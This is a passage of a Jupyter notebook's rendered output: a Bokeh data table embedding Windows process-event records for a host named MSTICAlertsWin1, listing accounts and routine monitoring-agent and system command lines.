console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"dd9cf645-1572-400f-9714-dd67b652feb7\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1273\"},{\"id\":\"1274\"},{\"id\":\"1280\"},{\"id\":\"1275\"},{\"id\":\"1276\"},{\"id\":\"1277\"},{\"id\":\"1278\"}],\"editable\":true,\"height\":550,\"source\":{\"id\":\"1249\"},\"view\":{\"id\":\"1270\"},\"width_policy\":\"max\"},\"id\":\"1271\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1321\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1322\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1330\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1324\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1322\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1321\"},\"title\":\"Account\",\"width\":26},\"id\":\"1273\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1320\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1327\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1325\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1324\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1323\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1274\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1326\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1333\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1329\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1333\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1332\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1278\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1328\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1327\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1326\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1275\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1279\",\"type\":\"DateFormatter\"},{\"attributes\":{},\"id\":\"1331\",\"type\":\"StringEditor\"},{\"attributes\":{\"source\":{\"id\":\"1249\"}},\"id\":\"1270\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program 